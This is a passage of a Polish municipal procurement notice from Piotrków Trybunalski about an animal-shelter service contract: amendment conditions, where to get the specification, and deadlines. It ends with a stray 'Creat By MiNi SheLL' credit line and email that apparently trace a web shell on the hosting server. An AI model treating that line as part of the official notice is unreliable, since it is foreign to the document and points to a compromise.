<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Umowa na realizację zamówienia zostanie zawarta na warunkach wymienionych 
w załączonym do SIWZ wzorze umowy.
Dopuszcza się zawarcie aneksów do umowy w wypadku:
- Zmiany przepisów prawa związanych z prowadzeniem schroniska.
- Uruchomienia hotelu dla zwierząt.
- Nagłej i nieprzewidzianej zmiany warunków prowadzenia schroniska, powodującej niemożność zachowania postanowień zawartych w umowie.
- Zmiany stawki podatku VAT w przypadku jej zmiany przez władzę ustawodawczą.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.piotrkow.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miasta Piotrkowa Trybunalskiego
Pasaż Karola Rudowskiego 10 
Piotrków Tryb. 97-300 
pok.317.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 12.12.2011 godzina 08:30, miejsce: Urząd Miasta Piotrkowa Trybunalskiego
Pasaż Karola Rudowskiego 10 
Piotrków Tryb. 97-300 
pok.317.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com